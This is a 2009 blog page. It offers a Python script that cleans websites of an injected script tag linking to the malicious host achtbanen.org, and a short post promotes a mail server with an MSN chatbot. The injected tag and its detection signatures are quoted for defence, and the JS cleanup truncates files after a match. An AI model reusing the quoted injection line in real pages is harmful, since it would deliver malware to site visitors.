Monday, October 19, 2009

Removing “achtbanen” trojan links

Ok so someone got careless and somehow his website files have been replaced with links to a trojan. Each of the html/asp files have been injected with a script “<script src=http://achtbanen.org/images/blah blah blah></script>”

I was asked to write a script to clean it up, so here it is, a script injector remover, basically will work on any injected one liner script (modify the signature on “FindThis” in the source yourself), by default will remove this particular achtbanen line.

TrjLinkRemove.py

# Copyright 2009, codemagnet.blogspot.com



# Free to use ;-), just keep this credit comments.



 



import sys



import os



import nowlog



 



logfile = nowlog.SetLogConfig("removed.log")



 



"""<script src=http://achtbanen.org/images/b-one-default.php ></script>"""



 



FindThis = "<script src=http://achtbanen.org/images"



FindThisJS = "document.write('<script src=http://"



MaximumIndexTail = 150 #  search 150 off the first found signature



 



def dirwalk(dir):



    "walk a directory tree, using a generator"



    try :



        for f in os.listdir(dir):



            fullpath = os.path.join(dir,f)



            if os.path.isdir(fullpath) and not os.path.islink(fullpath):



                for x in dirwalk(fullpath):  # recurse into subdir



                    yield x



            else:



                yield fullpath            



    except :



        pass



                



            



def CleanFile (filename) :



    global FindThis



    try :



        f = open(filename, "rb")



        fb = f.read()



        f.close()



        



        i = fb.find(FindThis) 



        if i == -1 :



            return



        



        # found



        o = fb.find("</script>", i+len(FindThis), i+len(FindThis) + MaximumIndexTail)



        if o == -1:



            logfile.error("partial found, ignored, %s", filename)



            return



        



        # create a new file



        newfile = filename + ".trj.rmv"



        p = open(filename + ".trj.rmv", "wb")



        p.write(fb[:i])



        p.write(fb[o+9:])



        p.close()



        



        os.rename(filename, filename + ".xxxx")



        os.rename(newfile, filename)



        os.unlink(filename + ".xxxx")



        logfile.info("Cleaning : %s", filename)        



        



    except :



        logfile.error("unable to open file %s", filename)



        return



   



#-------------------------------------------------------------------------#



 



def CleanFileJS (filename) :



    global FindThis



    try :



        f = open(filename, "rb")



        fb = f.read()



        f.close()



        



        i = fb.find(FindThisJS) 



        if i == -1 :



            return



        



        # found



        o = fb.find(".php", i+len(FindThisJS), i+len(FindThisJS) + MaximumIndexTail)



        if o == -1:



            logfile.error("partial found, ignored, %s", filename)



            return



        



        # create a new file



        newfile = filename + ".trj.rmv"



        p = open(filename + ".trj.rmv", "wb")



        p.write(fb[:i])



        p.close()



        



        os.rename(filename, filename + ".xxxx")



        os.rename(newfile, filename)



        os.unlink(filename + ".xxxx")



        logfile.info("Cleaning : %s", filename)        



        



    except :



        logfile.error("unable to open file %s", filename)



        return



 



            



def cleanup (path) :



    for x in dirwalk(path) :



        o = x.split(".")



        if o[-1].lower() in ["asp","html","htm", "aspx"] :



            CleanFile(x)          



            continue



        if o[-1].lower() == "js" :



            CleanFileJS(x)        



      



 



if __name__ == "__main__" :



    if len(sys.argv) < 2 :



        print "Removes achtbanen trojan links from all webfiles"



        print "TrjLinkRemove <path>"



        print "e.g TrjLinkRemove c:\\iisroot"



        sys.exit(1)



        



    if not os.path.exists(sys.argv[1]) :



        print "invalid path given"



        sys.exit(1)



        



    cleanup(sys.argv[1])    



        



    




nowlog.py





import logging, logging.handlers



 



def SetLogConfig (namefile):



    



    logfile = logging.handlers.TimedRotatingFileHandler(namefile , 'midnight', 1, backupCount=14)



    logfile.setLevel(logging.INFO)    



    FORMAT = "%(asctime)-15s %(levelname)s:[%(thread)d]:%(message)s"           



    logfile.setFormatter(logging.Formatter(FORMAT))    



    



    ch = logging.StreamHandler()



    ch.setLevel(logging.INFO)



    



    Logger = logging.getLogger(namefile)



    Logger.addHandler(logfile)



    Logger.addHandler(ch)



    Logger.setLevel(logging.INFO)    



    



    return Logger








* sorry about the formatting –.- was using a code snippet plugin

Wednesday, October 14, 2009

World First Email Server with MSN Robot (Avatar)

This is probably true as the team gets ready to launch MailNow!5

MailNow! 5 is a Windows Mail Server that is of the likes of SmarterMail, Mdaemon, Merak and Hmail. The difference would be the amount of innovation that the team built into the MailNow! 5 that would eliminate log searching, greps etc for mail tracing , anti domain queue hogging and features on accountability that is way off the conventional school.

One distinct one is the world first Email Server Robot or Avatar. Its is an MSN robot that would inform users of the mail server status, new mails alert + details, collect log files, send SMS alerts, compose emails, retrieve emails, provide Email server spam statistics, emails per hour statistics and provide an “eliza” chat for idle users.

Looks really cool when it was demoed today. I guess the folks attending the launch on 12 Nov, 2009  will get some sneak peek too. (www.internetnow.com.my)

If you see any other mail servers adding this feature in the future, you heard it here first. That Malaysian made, MailNow! 5 , the windows mail server…had the first ever robot.

The team won’t be patenting it, the team here is just too engrossed in technical development than to invest in any legal procedures to write such a patent. Chances is MS Exchange would build one super robot in the future and who’s gonna sue?